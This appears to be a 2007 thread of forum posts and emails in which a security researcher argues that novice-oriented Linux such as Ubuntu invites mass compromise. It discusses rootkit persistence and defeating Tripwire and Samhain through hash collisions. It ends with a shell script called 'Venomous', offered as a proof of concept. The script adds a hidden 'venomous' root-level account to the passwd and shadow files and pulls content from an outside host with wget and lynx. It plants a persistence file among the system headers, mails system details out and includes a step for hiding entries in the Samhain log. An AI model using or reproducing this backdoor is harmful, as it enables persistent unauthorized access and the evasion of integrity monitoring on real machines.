Really... Worse than nuclear proliferation, genocide, diseases, etc?

It's called "figuratively" speaking...

It's not all too powerful. Windows is just as powerful if you have the right tools or know some scripting and programming languages to craft your own. I say this, and I'm one of the biggest Linux fans you'll ever see.

Windows could never compete with Linux on 1) a networking scale 2) on methods to capture what is going on (lsof vs. Task Manager). I can build you a worm that would be undetectable on Linux versus one on Windows. I suggest you google rootkeep which I wrote in 1998. Upon gaining root, it always gave you a backdoor even after cleaning the backdoor out. Clean the machine, reboot, backdoor was still there. It took a lot of checksumming, and digging for rootkeep and I wrote it, out of boredom, without really flowcharting it in under an hour. 1) There are far more antivirus companies catering to Windows and eventually they'll catch on. Windows is straightforward in terms of doing an analysis. Nix is a more difficult beast to contain so again I ask... What would you do under these pretenses when a couple of hundred thousand grannies have their Ubuntu machines compromised.

Let's take this to a legal level now. We've all heard about the old woman who was molested by the RIAA for downloading... She was dead, etc., that is a no brainer. Easy for authorities to track down. Now let's throw this scenario out there... Old grandpa went and bought himself an Ubuntu powered Dell that was compromised and used to host kiddie pix. The attackers modified all sorts of scripts to clean up after themselves as if no intrusion ocurred. The feds arrest old grandpa. Guess what, there is no evidence of the compromise and grandpa was clueless. There was and never will be any antivirus I could think of to stop that from happening. You think the feds will care whether grandpa is telling the truth. I suggest you read some legal casefiles and understand the harsh realities of laws in the US.

If someone compiles applications that perform DOS attacks and writes viruses that take advantage of 0day exploits, I don't really think you can call them simple script kiddies anymore.

I suggest you go out and acquaint yourself with the true definition of script kiddie.

The rest of the article is pure sensationalism and an extremely contrived example of which you can do the exact same in a Windows environment.

You CAN do SIMILAR things under Windows but not to the same extent.

Now if script kiddies already using Windows never rose to the occasion, why would handing out Linux boxes to granny be any different? They didn't take the opportunity then and they probably won't even if Linux becomes mainstream (which it won't any time soon here in the US where everyone can afford Windows). Why, well they're probably called "script kiddies" for a reason. Maybe your opinion of them is too high

Windows has never had 1) the amount of moronic tools available under *Nix. Tools like Fragroute, IRPAS, Scapy. Enabling them the option to have these tools is a big mistake. Its not alarmist and perhaps I could have stated "idiots in the malware, organized e-Crime world." One in all they're the same to me.

The difference again, between Windows based idiots and those using *Nix (Solaris, BSD, Linux) as their platform of choice, is, it actually takes someone with a little more than a clue. By script kiddiots I'm not talking about a juvenile with too much time on his hands compiling smurf. I'm talking about the phishers, the malware spreaders, the organized idiots who would have the best/worst tool at their disposal.

So maybe I should re-write "script kiddiots/e-organized crimesters/fraudsters/phishers". Would it make more sense to some of you then.

That's what Tripwire is for...

You won't necessarily need to defeat a well configured file integrity checker. In fact all you'd need to do is cause more than one collision and that's already been done a while back

http://www.cits.rub.de/MD5Collisions/
http://www.schneier.com/blog/archives/2005/02/sha1_broken.html

How trustworthy would you deem Tripwire, etal to be if all of the sudden you're seeing all sorts of collisions? I wrote a program a while back to do that too... Take two checksums (http://tinyurl.com/22enmt) for files on a Unix based system but everyone screamed "overboard security!" ... Was it? What were the odds of someone leveraging both md5 and sha1 in the same setting, on the same intrusion, in under 59 minutes (amount of time in crontab) before I caught them? I may redo the intergrity checker soon who knows... When I have a week to kill. May even make it database driven with information stored offsite for comparative analysis... Who knows...

To answer your question though, for my rootkit to work it does not need to modify anything. It never downloads anything, never touches anything... Quick logical flowchart...

/usr/includes (files are already there)
/tmp/ garbage is stored here...

first
go into certain files from /usr/includes and elsewhere
then
parse out certain words from these files... remember to change the files you look at
after
take all these words and combine them into a script in /tmp
then
run that script in /tmp
after
delete yourself

What are you looking for? The script is gone and it never downloaded or save anything... Yet you will still be backdoored... If I HAD TO modify some of the files, they would be random files as well, never the same...

You would have to run tripwire of other similar program non-stop and catch it at that instance... Make more sense now? That WITHOUT the fact that I could cause one or two collisions if you rely on md5 and sha1... How many false positives before the typical admin just ignores errors? Its human nature... So go out and recompile the latest stable version of whatever... What do you think sysadmins would do when that newly compiled version of whatever is giving them false positives... They'll ignore it... And we're talking sysadmins here... The original article covered grannies ;)

PS... Think you can chmod||chown /tmp? Try it well see how fast things break.

Okay, sounds good. But what is this script and how do you get it on the computer in the first place? I'm talking about the original script that parses the other files.... to create a script that runs in the /tmp? And if it can't find all the words necessary to create your script?

I won't argue either of those points

Glad you asked... Its all browser based off of yet another concept... (That concept is proven too btw...)

http://www.securityfocus.com/archive/1/466175/30/180/threaded
http://www.infiltrated.net/index.php?id=news&do=2&item=8
http://www.securityfocus.com/archive/1/466017/30/30/threaded
http://www.infiltrated.net/exploder.java.txt (theory... pseudo proven... I won't publicize this portion)

e-Mails...

Here is the thing, this is an assumption. Firstly it would be outright strange to have a grandmother install Ubuntu or any other operating system. This will likely come via a grandchild, son, (other relative) or perhaps someone a-la "Geek Squad". In either event, grandma, grandpa, etal will be the end user(s). Its often an inexperienced admin (even some experienced ones are guilty) that will/can overlook something.

Its humorous because while scrapping this article together, I was in discussion with one of my coworkers who's an avid FreeBSD user. I was discussing the pros and cons about using Tripwire/Samhain like products and how one could parse out and reinject checksum hashes. It was my notion that after so many false positives being injected into Tripwire and Samhain, and administrator will likely turn a blind eye to it. Similar to someone using Snort. Popular for a day, becomes cumbersome to manage, often chucked or not monitored.

It is these admins installing that cause worries.

> Given a general populous of "tinkerers", my own mother being a perfect
> example, there will be a larger threat, and that threat must be dealt
> with using software controls. My mother will install anything that she
> thinks might remotely play a game. She ***bought*** comet cursor. I
> digress.

Ironic, I worked at Comet Systems once upon a time. ;)

Tinkerers are tinkerers are tinkerers. I'm the biggest one I know. It's often the tinkerers yes who will make life hellish for many an admin, but under the *Nix* umbrella, its these tinkerers network operators should be least worried about and I'll attempt to explain why...

As a tinkerer, I'm constantly watching what is going on, then investigating why. As a tinkerer, I've learned the ins and outs (at least in my mind) of what my system is doing and why. Its the non tinkerers, those who leave their machines connected, watching it crawl due to lack of memory because of an infestation of viruses and malware, that cause the most problems.

I worked at a University about three/four years ago. I remember a student who's machine was turned on at the beginning of the school year and left on. She played mp3's non stop and could not do anything with her machine. She finally brought it to us in February (mind you classes started in August) because she had become frustrated with why her machine did nothing and was only an mp3 player. Lo and behold she had the worst machine I've *EVER* seen. We're talking hundreds of instances of differing viruses, thousands of instances of malware. She brought her machine in because we saw her connection generating a constant 4Mbps of traffic. And I mean constant.

> For users like her, the root account must either not be enabled, or
> not available to her, accessible only via a password which she doesn't
> have. There are various security methods for accomplishing this. I
> know personally that NAPA's Solaris servers have root passwords that
> are a function of the time/date. A similar configuration could be
> easily arranged for dell technicians to obtain local / remote access
> in the event it is needed.

You're again assuming that Dell will undertake the role of doing the right thing. 1) It's not their job. 2) Highly doubtable they will invest the time to do so. 3) How do you tell someone "we can't/won't give you the administrator password for your machine. I'd laugh at any vendor who told me that.

> The bottom line is that worms are dependent on one resource:
> homogeneous systems which contain vulnerabilities. An unlocked root
> account is as much a vulnerability as a shoddy Sendmail version.
> Assuming proper software updates (now readily available in Ubuntu) and
> the correct security policies (also in place), very little chance
> exists for exploiting large swaths of systems, with the exception of a
> compromise at an update repository.

Bottom line is, Linux, BSD, Solaris, I don't care which you want to name are vulnerable at some given point in time. It's that "ONE" point in time someone would need to creating an epidemic. Of course I don't forsee this happening, I solely wanted to point out the obvious and not so obvious to Ubuntu and Linux developers... "Be extremely cautious as you progress". That's it nothing more. As for security updates under any system, let's be realistic here, how many people turn these off after a while. I've seen the most hardened admins turn them off. Security policies? I've seen the most hardened security admins turn them off (SELinux comes to mind).

Compromise at an update repository? You mean similar to when Debian's servers were compromised?

> PS - I'll be posting this as an open letter on my LiveJournal, with a
> link to your article

As I too will add this to the Ubuntu page.

via email...

Comments inline.

First off, great article, very thoughtful.

Thanks for the response I like seeing differing points of view.

I think one of the points you touched on (but didn't directly state) is that the old mainframe paradigm of "user" versus "administrator" doesn't suit desktop PCs in unmanaged environments, so it's not a secure line of defense for most people.

One of the main things that keeps popping to mind is priviledge escalation. Too many people who read this document are forgetting that something as uncommon as a bug in say Firefox, Thunderbird, Evolution, etc., can lead to priviledge escalation. The most common comments thusfar has been "You can't be root in Ubuntu stupid... Or my grandma would never be root" or things along those lines. Its a shortsighted view many nix zealots take. I know administrators who've been on the computing scene PROFESSIONALLY for years who have their own habits. Some almost exclusively log on and surf around as root.

A desktop PC user _is_ (and needs to be) the administrator of their own machine in order to do common things like install programs, configure system settings, add/remove hardware, etc. Ordinary users are going to get pissed if they can't do those kinds of things on a pretty frequent basis.

Indeed the user of a home based system is almost always going to be the superuser slash admin of the machine regardless of any argument anyone in the Linux community can give. How long until the moment comes where they will have to log in as root in order to do something. The attitude almost always will become "Well why should I use my other account if I have to keep switching to admin to get something done". That's when like it or not, you will have the clueless admin boom.

Given that need, it's technically impossible to bulletproof the system to keep people from shooting themselves in the foot. You _have_ to give them a gun to give them the capabilities they demand to have.

True to an extent. There is / was a company called Argus Systems who made a program called Pitbull I played with in the late 90's. They had a great concept of modules atop of modules which worked together to deter escalations. Another concept was Trusted Solaris' model. But again, the more restrictive of a machine you make, the less the average user would want to use it.

So the best you can hope to do is make the system simple enough, transparent enough, and understandable enough to manage that even ordinary people really can't get too confused about how to properly administer the system. The more complex the gun, the more likely they are to accidentally shoot themselves out of confusion.

Problem... Imagine giving your grandmother or teen Windows 2003 SMB server with ISA Server and IIS installed. This to me is something close to what Ubuntu and other "Desktop Linux for Newbies" distribution makers are doing. I don't feel they're doing this out of malice or ignorance. I think they're being too trusting of the operating system forgetting the dangers of the Internet and those seeking to profit from these dangers e.g. Malware, virus, botnet, worm creators.

*nix systems are such an unwieldy complex mess to administer that there's no hope for ordinary desktop PC users to figure things out. Nevermind the security risks presented by such a complex system -- the installation and administrative overhead is what keeps people from adopting it.

I believe you hit the nail on the head by mentioning the complexities, but I think you missed out on the fact that "Desktop Linux for Newbies" distribution developers are trying to place a pretty picture on top of these complexities and giving that same complex mess to someone who should probably not be given that amount of computing power.

Linux users, heck most *Nix (BSD/Solaris) users will swear this is akin to Gibson's crackpot article, maybe to a degree it is just on a different level. Gibson's argument was complete speculation. I've given a proof of concept framework via a bloated shell script to make a point. I could have eloquently written it in C, Perl, Ruby but I didn't for a few reasons. 1) It was a concept so I didn't care for much other than saying "Here"... 2) Portability... The annoying worm is portable to any system including legacy systems. If you think that EVERY SINGLE *Nix box will ALWAYS HAVE Perl, Ruby, etc., installed you're mistaken; Awk and Sed will be.

If the FOSS community really wants to succeed, they should refocus their efforts on simplifying the system -- not by hiding layers of complexity and shell scripts away behind pretty GUIs, but by truly re-architecting to reduce unnecessary over-engineering.

I think the community is so overwhelmed with producing top of the line, state of the art tools anyone could use for any purpose. But there is little collaboration between the varying degrees of developers. This is where the issues arise. This is also Microsoft's biggest FUD generator. "Well Linux had 100 holes last month" when in fact, there might have been 2 holes in Linux, but 98 holes in other programs developed by someone in the FOSS community. The blame just gets tacked on Linux, Microsoft then spends a couple of million promoting their FUD, companies get scared away. Welcome to the business world.

// Keith My Slashdot posts: http://slashdot.org/~c0d3h4x0r

# !/bin/sh
# Venomous
# Linux PoC backdoor keeper...
# J. Oquendo (c) 05/09/2007 
# echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'

# If you have to ask you shouldn't run this
# password for venomous is password


happy=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
days=`awk 'NR==74 {gsub(/,/,"");print $8}' /usr/include/sysexits.h`
guitar=`wget -qO - http://www.infiltrated.net/guitar|sed -n '1p'`
sed -n '1p' $happy|awk -F ":" 'BEGIN{OFS=":"}{$1="venomous"}1{$2=""}2' >> $days
sed -n '1p' $days|sed 's/[^:]*:/venomous:/'|awk -vguitar=$guitar -F ":" 'BEGIN{OFS=":"}{$2='guitar'}2' >> $happy
what=`sed -n '58p' /usr/include/sysexits.h |awk '{print $5}'`
who=`sed -n '60p' /usr/include/linux/wireless.h |awk 'gsub(/,/, ""){print $4" -a"}'`
echo "Enter your email address" ; read ans ; where=$ans
$who | $what $where


# Ugly method too keep a rootaccount Follows...
# For those not in the know... This idea is to prove a
# point not give you another tool to be morons with.
# Instead of ruining, how about solving...

# Pick a ranDumb file in /usr/includes/ then create the same
# backdoor on the system using this hidden file... Do something
# sneaky to place this file on a startup

# Note the location... Highly doubtable to remove an actual
# include file unless some stupid admin did something really
# dumb...

random=`date|awk -F : '{print $3}'|awk '{print $1}'`
echo $random > /tmp/secCommand
sad=`awk '{print "ls /usr/include|sed -n '\''"$1"p'\''"}' /tmp/secCommand|sed -n '1p'`
rm /tmp/secCommand
filename=`echo $sad|sh|awk -F . '{print $1}'`

lynx -dump http://www.infiltrated.net/ubuntuDestruction.php|sed -n '226,233p' >> /usr/local/include/$filename.h

# Wanna hide your entries in Samhain?
# uncomment rm /tmp/secCommand ... and uncomment the line below
# awk -vfilename=$filename '{print "perl -pi -e '\''s/'$filename'/samhain/g'\''"}' /var/log/samhain_log|sh

# Now of course I could have modified this to replicate any one
# of the files on startup but again... PoC ... The naysayers
# will ramble on about "You're out of your mind..." Am I? I've
# given you the PoC's what more do you want... Ubuntu or any
# Linux for the lowly home user is a horrible idea...

# And AGAIN before someone fires off "I would see the URL
# and that's a dead giveaway!" ... Look, I'm trying to make
# a point here... I personally have a functioning backdoor
# undetectable to most integrity checkers, Samhain, Tripwire
# etc., but why should I disclose this anywhere. It's not in
# the best interest of anyone to do so... Don't bother asking
# for it via email because it's not public and will never be...

# This again... Was to prove a point to the naysayers who
# this shit doesn't happen... Keep dreaming. Its only a matter
# of time before you guys go "Goo Goo" about getting Linux for
# Idjits off the ground, but its a horrible mistake in the
# making